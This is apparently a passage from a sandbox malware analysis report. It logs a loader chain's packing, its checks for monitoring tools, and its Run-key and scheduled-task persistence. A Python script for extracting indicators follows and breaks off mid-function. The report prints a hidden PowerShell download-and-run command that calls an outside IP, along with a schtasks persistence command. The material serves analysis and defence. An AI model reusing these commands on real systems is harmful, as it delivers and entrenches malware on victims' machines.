                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe Section loaded: msasn1.dll
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe Section loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe Section loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe Section loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe Section loaded: gpapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe Section loaded: dpapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe Section loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeSection loaded: wbemcomn.dll
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeSection loaded: amsi.dll
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeSection loaded: userenv.dll
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\System32\spoolsv.exe | Section loaded: dsrole.dll
                      Source: C:\Windows\System32\spoolsv.exe | Section loaded: dnsapi.dll
                      Source: C:\Windows\System32\spoolsv.exe | Section loaded: iphlpapi.dll
                      Source: C:\Windows\System32\spoolsv.exe | Section loaded: ualapi.dll
                      Source: C:\Windows\System32\spoolsv.exe | Section loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\spoolsv.exe | Section loaded: powrprof.dll
                      Source: C:\Windows\System32\spoolsv.exe | Section loaded: umpdc.dll
                      Source: C:\Windows\System32\spoolsv.exe | Section loaded: sspicli.dll
                      Source: C:\Windows\System32\spoolsv.exe | Section loaded: mswsock.dll
                      Source: C:\Windows\System32\spoolsv.exe | Section loaded: wtsapi32.dll
                      Source: C:\Windows\System32\spoolsv.exe | Section loaded: userenv.dll
                      Source: C:\Windows\System32\spoolsv.exe | Section loaded: netapi32.dll
                      Source: C:\Windows\System32\spoolsv.exe | Section loaded: version.dll
                      Source: C:\Windows\System32\spoolsv.exe | Section loaded: wbemcomn.dll
                      Source: C:\Windows\System32\mshta.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32
                      Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
                      Source: Window Recorder | Window detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                      Source: Binary string: lib.pdb source: powershell.exe, 0000000F.00000002.1055301603.0000024DF86CE000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: bpdbtem.pdb source: powershell.exe, 0000000F.00000002.1055301603.0000024DF86CE000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: re.pdb; source: powershell.exe, 0000000F.00000002.1055301603.0000024DF86CE000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: lib.pdb6 source: powershell.exe, 0000000F.00000002.1055301603.0000024DF86CE000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: ab5415a7b5.exe, 00000035.00000003.1955416141.00000000049B0000.00000004.00001000.00020000.00000000.sdmp, ab5415a7b5.exe, 00000035.00000002.2093414321.0000000000D12000.00000040.00000001.01000000.00000017.sdmp

                      Data Obfuscation

                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | Unpacked PE file: 17.2.483d2fa8a0d53818306efeb32d3.exe.300000.0.unpack :EW;.rsrc:W;.idata :W; :EW;rrnnqshc:EW;joxwbcxj:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;rrnnqshc:EW;joxwbcxj:EW;.taggant:EW;
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | Unpacked PE file: 18.2.483d2fa8a0d53818306efeb32d3.exe.300000.0.unpack :EW;.rsrc:W;.idata :W; :EW;rrnnqshc:EW;joxwbcxj:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;rrnnqshc:EW;joxwbcxj:EW;.taggant:EW;
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Unpacked PE file: 19.2.rapes.exe.430000.0.unpack :EW;.rsrc:W;.idata :W; :EW;rrnnqshc:EW;joxwbcxj:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;rrnnqshc:EW;joxwbcxj:EW;.taggant:EW;
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Unpacked PE file: 20.2.rapes.exe.430000.0.unpack :EW;.rsrc:W;.idata :W; :EW;rrnnqshc:EW;joxwbcxj:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;rrnnqshc:EW;joxwbcxj:EW;.taggant:EW;
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Unpacked PE file: 28.2.rapes.exe.430000.0.unpack :EW;.rsrc:W;.idata :W; :EW;rrnnqshc:EW;joxwbcxj:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;rrnnqshc:EW;joxwbcxj:EW;.taggant:EW;
                      Source: C:\Users\user\AppData\Local\Temp\10128550101\bb5ad48269.exe | Unpacked PE file: 33.2.bb5ad48269.exe.ec0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;zwvttbmt:EW;qrioviwp:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;zwvttbmt:EW;qrioviwp:EW;.taggant:EW;
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe | Unpacked PE file: 35.2.19be97887a.exe.e20000.0.unpack :EW;.rsrc:W;.idata :W;wpdhoglv:EW;sxpkxloz:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;wpdhoglv:EW;sxpkxloz:EW;.taggant:EW;
                      Source: C:\Users\user\AppData\Local\Temp\10128550101\bb5ad48269.exe | Unpacked PE file: 54.2.bb5ad48269.exe.ec0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;zwvttbmt:EW;qrioviwp:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;zwvttbmt:EW;qrioviwp:EW;.taggant:EW;
                      Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exe | Code function: 34_2_009042DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 34_2_009042DE
                      Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
                      Source: 2qv26zF[1].exe.28.dr | Static PE information: real checksum: 0x0 should be: 0xe49e5
                      Source: 483d2fa8a0d53818306efeb32d3.exe.12.dr | Static PE information: real checksum: 0x1dca59 should be: 0x1d42c7
                      Source: D51OAO8D0TVNMCQXHC.exe.30.dr | Static PE information: real checksum: 0x1d326a should be: 0x1d7500
                      Source: random[1].exe2.28.dr | Static PE information: real checksum: 0x2aa5f1 should be: 0x2a7431
                      Source: ab5415a7b5.exe.28.dr | Static PE information: real checksum: 0x2aa5f1 should be: 0x2a7431
                      Source: 19be97887a.exe.28.dr | Static PE information: real checksum: 0x3269e8 should be: 0x320a82
                      Source: 2qv26zF.exe.28.dr | Static PE information: real checksum: 0x0 should be: 0xe49e5
                      Source: 60eb3ded99.exe.28.dr | Static PE information: real checksum: 0x2d43aa should be: 0x2d183f
                      Source: random[1].exe.28.dr | Static PE information: real checksum: 0x3269e8 should be: 0x320a82
                      Source: rapes.exe.17.dr | Static PE information: real checksum: 0x1dca59 should be: 0x1d42c7
                      Source: random[1].exe0.28.dr | Static PE information: real checksum: 0x1b6030 should be: 0x1af04e
                      Source: bb5ad48269.exe.28.dr | Static PE information: real checksum: 0x1b6030 should be: 0x1af04e
                      Source: random[2].exe0.28.dr | Static PE information: real checksum: 0x2d43aa should be: 0x2d183f
                      Source: 483d2fa8a0d53818306efeb32d3.exe.12.dr | Static PE information: section name:
                      Source: 483d2fa8a0d53818306efeb32d3.exe.12.dr | Static PE information: section name: .idata
                      Source: 483d2fa8a0d53818306efeb32d3.exe.12.dr | Static PE information: section name:
                      Source: 483d2fa8a0d53818306efeb32d3.exe.12.dr | Static PE information: section name: rrnnqshc
                      Source: 483d2fa8a0d53818306efeb32d3.exe.12.dr | Static PE information: section name: joxwbcxj
                      Source: 483d2fa8a0d53818306efeb32d3.exe.12.dr | Static PE information: section name: .taggant
                      Source: rapes.exe.17.dr | Static PE information: section name:
                      Source: rapes.exe.17.dr | Static PE information: section name: .idata
                      Source: rapes.exe.17.dr | Static PE information: section name:
                      Source: rapes.exe.17.dr | Static PE information: section name: rrnnqshc
                      Source: rapes.exe.17.dr | Static PE information: section name: joxwbcxj
                      Source: rapes.exe.17.dr | Static PE information: section name: .taggant
                      Source: random[1].exe.28.dr | Static PE information: section name:
                      Source: random[1].exe.28.dr | Static PE information: section name: .idata
                      Source: random[1].exe.28.dr | Static PE information: section name: wpdhoglv
                      Source: random[1].exe.28.dr | Static PE information: section name: sxpkxloz
                      Source: random[1].exe.28.dr | Static PE information: section name: .taggant
                      Source: 19be97887a.exe.28.dr | Static PE information: section name:
                      Source: 19be97887a.exe.28.dr | Static PE information: section name: .idata
                      Source: 19be97887a.exe.28.dr | Static PE information: section name: wpdhoglv
                      Source: 19be97887a.exe.28.dr | Static PE information: section name: sxpkxloz
                      Source: 19be97887a.exe.28.dr | Static PE information: section name: .taggant
                      Source: random[1].exe0.28.dr | Static PE information: section name:
                      Source: random[1].exe0.28.dr | Static PE information: section name: .idata
                      Source: random[1].exe0.28.dr | Static PE information: section name:
                      Source: random[1].exe0.28.dr | Static PE information: section name: zwvttbmt
                      Source: random[1].exe0.28.dr | Static PE information: section name: qrioviwp
                      Source: random[1].exe0.28.dr | Static PE information: section name: .taggant
                      Source: bb5ad48269.exe.28.dr | Static PE information: section name:
                      Source: bb5ad48269.exe.28.dr | Static PE information: section name: .idata
                      Source: bb5ad48269.exe.28.dr | Static PE information: section name:
                      Source: bb5ad48269.exe.28.dr | Static PE information: section name: zwvttbmt
                      Source: bb5ad48269.exe.28.dr | Static PE information: section name: qrioviwp
                      Source: bb5ad48269.exe.28.dr | Static PE information: section name: .taggant
                      Source: random[1].exe2.28.dr | Static PE information: section name:
                      Source: random[1].exe2.28.dr | Static PE information: section name: .idata
                      Source: random[1].exe2.28.dr | Static PE information: section name: awtxvwji
                      Source: random[1].exe2.28.dr | Static PE information: section name: vgzlruyg
                      Source: random[1].exe2.28.dr | Static PE information: section name: .taggant
                      Source: ab5415a7b5.exe.28.dr | Static PE information: section name:
                      Source: ab5415a7b5.exe.28.dr | Static PE information: section name: .idata
                      Source: ab5415a7b5.exe.28.dr | Static PE information: section name: awtxvwji
                      Source: ab5415a7b5.exe.28.dr | Static PE information: section name: vgzlruyg
                      Source: ab5415a7b5.exe.28.dr | Static PE information: section name: .taggant
                      Source: random[2].exe0.28.dr | Static PE information: section name:
                      Source: random[2].exe0.28.dr | Static PE information: section name: .idata
                      Source: random[2].exe0.28.dr | Static PE information: section name: szulyqbn
                      Source: random[2].exe0.28.dr | Static PE information: section name: vcufrmmi
                      Source: random[2].exe0.28.dr | Static PE information: section name: .taggant
                      Source: 60eb3ded99.exe.28.dr | Static PE information: section name:
                      Source: 60eb3ded99.exe.28.dr | Static PE information: section name: .idata
                      Source: 60eb3ded99.exe.28.dr | Static PE information: section name: szulyqbn
                      Source: 60eb3ded99.exe.28.dr | Static PE information: section name: vcufrmmi
                      Source: 60eb3ded99.exe.28.dr | Static PE information: section name: .taggant
                      Source: D51OAO8D0TVNMCQXHC.exe.30.dr | Static PE information: section name:
                      Source: D51OAO8D0TVNMCQXHC.exe.30.dr | Static PE information: section name: .idata
                      Source: D51OAO8D0TVNMCQXHC.exe.30.dr | Static PE information: section name:
                      Source: D51OAO8D0TVNMCQXHC.exe.30.dr | Static PE information: section name: boxephyl
                      Source: D51OAO8D0TVNMCQXHC.exe.30.dr | Static PE information: section name: tkoucrpj
                      Source: D51OAO8D0TVNMCQXHC.exe.30.dr | Static PE information: section name: .taggant
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 12_2_00007FF9365E00BD pushad ; iretd 12_2_00007FF9365E00C1
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Code function: 28_2_00459FC1 push ecx; ret 28_2_00459FD4
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exe | Code function: 34_2_00920A76 push ecx; ret 34_2_00920A89
                      Source: 483d2fa8a0d53818306efeb32d3.exe.12.dr | Static PE information: section name: entropy: 7.985810543604375
                      Source: 483d2fa8a0d53818306efeb32d3.exe.12.dr | Static PE information: section name: rrnnqshc entropy: 7.954067417617069
                      Source: rapes.exe.17.dr | Static PE information: section name: entropy: 7.985810543604375
                      Source: rapes.exe.17.dr | Static PE information: section name: rrnnqshc entropy: 7.954067417617069
                      Source: random[1].exe.28.dr | Static PE information: section name: entropy: 7.183955065223692
                      Source: 19be97887a.exe.28.dr | Static PE information: section name: entropy: 7.183955065223692
                      Source: random[1].exe0.28.dr | Static PE information: section name: zwvttbmt entropy: 7.954254378247319
                      Source: bb5ad48269.exe.28.dr | Static PE information: section name: zwvttbmt entropy: 7.954254378247319
                      Source: random[1].exe2.28.dr | Static PE information: section name: entropy: 7.802895856876273
                      Source: ab5415a7b5.exe.28.dr | Static PE information: section name: entropy: 7.802895856876273
                      Source: random[2].exe0.28.dr | Static PE information: section name: entropy: 7.980340550228604
                      Source: 60eb3ded99.exe.28.dr | Static PE information: section name: entropy: 7.980340550228604
                      Source: D51OAO8D0TVNMCQXHC.exe.30.dr | Static PE information: section name: entropy: 7.97204148426787
                      Source: D51OAO8D0TVNMCQXHC.exe.30.dr | Static PE information: section name: boxephyl entropy: 7.954461811845

                      Persistence and Installation Behavior

                      Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | File created: C:\Users\user\AppData\Local\Temp\10128550101\bb5ad48269.exe
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[1].exe
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | File created: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exe
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | File created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\random[2].exe
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | File created: C:\Users\user\AppData\Local\Temp\10128580101\6f3323f1e6.exe
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\random[1].exe
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe | File created: C:\Users\user\AppData\Local\Temp\D51OAO8D0TVNMCQXHC.exe
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\random[1].exe
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\random[2].exe
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\2qv26zF[1].exe
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | File created: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\random[1].exe
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | File created: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exe
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | File created: C:\Users\user\AppData\Local\Temp\10128600101\60eb3ded99.exe
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | File created: C:\Users\user\AppData\Local\Temp\10128570101\ab5415a7b5.exe

                      Boot Survival

                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run am_no.cmd
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 19be97887a.exe
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 6f3323f1e6.exe
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run bb5ad48269.exe
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ab5415a7b5.exe
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run c6e8248d4e.exe
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | Window searched: window name: FilemonClass
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | Window searched: window name: PROCMON_WINDOW_CLASS
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | Window searched: window name: RegmonClass
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Window searched: window name: FilemonClass
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Window searched: window name: PROCMON_WINDOW_CLASS
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Window searched: window name: RegmonClass
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Window searched: window name: Regmonclass
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Window searched: window name: Filemonclass
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe | Window searched: window name: FilemonClass
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe | Window searched: window name: PROCMON_WINDOW_CLASS
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe | Window searched: window name: RegmonClass
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe | Window searched: window name: Regmonclass
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe | Window searched: window name: Filemonclass
                      Source: C:\Users\user\AppData\Local\Temp\10128550101\bb5ad48269.exe | Window searched: window name: FilemonClass
                      Source: C:\Users\user\AppData\Local\Temp\10128550101\bb5ad48269.exe | Window searched: window name: PROCMON_WINDOW_CLASS
                      Source: C:\Users\user\AppData\Local\Temp\10128550101\bb5ad48269.exe | Window searched: window name: RegmonClass
                      Source: C:\Users\user\AppData\Local\Temp\10128570101\ab5415a7b5.exeWindow searched: window name: FilemonClass
                      Source: C:\Users\user\AppData\Local\Temp\10128570101\ab5415a7b5.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                      Source: C:\Users\user\AppData\Local\Temp\10128570101\ab5415a7b5.exeWindow searched: window name: RegmonClass
                      Source: C:\Users\user\AppData\Local\Temp\10128570101\ab5415a7b5.exeWindow searched: window name: FilemonClass
                      Source: C:\Users\user\AppData\Local\Temp\10128570101\ab5415a7b5.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                      Source: C:\Users\user\AppData\Local\Temp\10128570101\ab5415a7b5.exeWindow searched: window name: Regmonclass
                      Source: C:\Users\user\AppData\Local\Temp\10128570101\ab5415a7b5.exeWindow searched: window name: Filemonclass
                      Source: C:\Users\user\AppData\Local\Temp\10128570101\ab5415a7b5.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                      Source: C:\Users\user\AppData\Local\Temp\10128550101\bb5ad48269.exeWindow searched: window name: FilemonClass
                      Source: C:\Users\user\AppData\Local\Temp\10128550101\bb5ad48269.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                      Source: C:\Users\user\AppData\Local\Temp\10128550101\bb5ad48269.exeWindow searched: window name: RegmonClass
                      Source: C:\Users\user\AppData\Local\Temp\10128550101\bb5ad48269.exeWindow searched: window name: FilemonClass
                      Source: C:\Users\user\AppData\Local\Temp\10128550101\bb5ad48269.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn "j5aLnmalkX9" /tr "mshta \"C:\Temp\mtzRdqIHD.hta\"" /sc minute /mo 25 /ru "user" /f
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe File created: C:\Windows\Tasks\rapes.job
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 19be97887a.exe
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run bb5ad48269.exe
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run c6e8248d4e.exe
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ab5415a7b5.exe
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 6f3323f1e6.exe
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run am_no.cmd
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exe Code function: 34_2_0091F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput 34_2_0091F98E
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exe Code function: 34_2_00991C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed 34_2_00991C41
                      Source: C:\Windows\System32\spoolsv.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5BC501E5-01E5-5BC5-CF2C-029728CF0C95} {912B21FC-21FC-912B-EF35-EC5D31EFE25F}
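The window-class probes (PROCMON_WINDOW_CLASS, RegmonClass, FilemonClass) and the persistence entries above (the schtasks task that runs mshta on an HTA every 25 minutes, the C:\Windows\Tasks\rapes.job file, and the HKCU Run values written by rapes.exe) are the lines an analyst would lift out of this report as indicators. As an added example, not part of the Joe Sandbox report or of the sample it analyses, the Python below parses behaviour lines of this shape, collapses the repeated entries, and turns them into hunting-level findings. The sample lines are constructed to mirror the report's format, and the list of analysis-tool window classes (Process Monitor, Regmon, Filemon) and the alert heuristics are assumptions made for the example.

```python
"""Pull anti-analysis probes and persistence IOCs out of Joe Sandbox-style behaviour lines.

Added example, not part of the Joe Sandbox report or of the sample it analyses.
SAMPLE_LINES are constructed to mirror the report's line shape; the window-class
list and the alert heuristics are assumptions made for this example.
"""
import re

# Window classes of the classic Sysinternals monitors (Process Monitor, Regmon,
# Filemon). A FindWindow() probe for any of them is an analyst-tooling check.
# Assumed list; matched case-insensitively because the report shows both spellings.
ANALYSIS_WINDOW_CLASSES = {"procmon_window_class", "regmonclass", "filemonclass"}

# "Source: <process path> <event>: <detail>"; \s* also accepts the glued form "exeWindow searched".
EVENT_RE = re.compile(
    r"^Source:\s*(?P<source>.+?)\s*"
    r"(?P<event>Window searched|Process created|Registry value created or modified|File created):\s*"
    r"(?P<detail>.+?)\s*$"
)
# schtasks switches as they appear in the report: /tn "name", /tr "action" (with \" escapes), /sc unit, /mo N
TN_RE = re.compile(r'/tn\s+"([^"]+)"')
TR_RE = re.compile(r'/tr\s+"((?:\\"|[^"])*)"')
SC_RE = re.compile(r"/sc\s+(\w+)", re.IGNORECASE)
MO_RE = re.compile(r"/mo\s+(\d+)")
TEMP_DIR_RE = re.compile(r"\\AppData\\Local\\Temp\\", re.IGNORECASE)

# Constructed sample, built in the shape of the report's entries (including a repeated line).
SAMPLE_LINES = [
    r"Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe Window searched: window name: PROCMON_WINDOW_CLASS",
    r"Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe Window searched: window name: Regmonclass",
    r"Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe Window searched: window name: PROCMON_WINDOW_CLASS",
    r"Source: C:\Users\user\AppData\Local\Temp\10128550101\bb5ad48269.exe Window searched: window name: FilemonClass",
    r'Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn "j5aLnmalkX9" /tr "mshta \"C:\Temp\mtzRdqIHD.hta\"" /sc minute /mo 25 /ru "user" /f',
    r"Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe File created: C:\Windows\Tasks\rapes.job",
    r"Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 19be97887a.exe",
    r"Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 19be97887a.exe",
    r"Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run am_no.cmd",
]


def parse_line(line):
    """Split one behaviour line into (source process, event type, detail); None if it is not one."""
    m = EVENT_RE.match(line.strip())
    return (m.group("source"), m.group("event"), m.group("detail")) if m else None


def parse_schtasks(cmdline):
    """Extract task name, action, schedule unit and interval from a 'schtasks /create' command line."""
    tn, tr, sc, mo = TN_RE.search(cmdline), TR_RE.search(cmdline), SC_RE.search(cmdline), MO_RE.search(cmdline)
    return {
        "name": tn.group(1) if tn else None,
        "action": tr.group(1).replace('\\"', '"') if tr else None,  # undo the \" escaping
        "schedule": sc.group(1).lower() if sc else None,
        "interval": int(mo.group(1)) if mo else None,
    }


def extract_iocs(lines):
    """Collect deduplicated probes and persistence artefacts from behaviour lines."""
    probes = {}       # source process -> set of analysis-tool window names it searched for
    run_values = {}   # (key, value name, writing process) -> None; dict keeps first-seen order
    tasks, job_files = [], []
    for line in lines:
        parsed = parse_line(line)
        if not parsed:
            continue
        source, event, detail = parsed
        if event == "Window searched":
            name = detail.split("window name:", 1)[-1].strip()
            if name.lower() in ANALYSIS_WINDOW_CLASSES:
                probes.setdefault(source, set()).add(name)
        elif event == "Registry value created or modified":
            key, _, value = detail.rpartition(" ")
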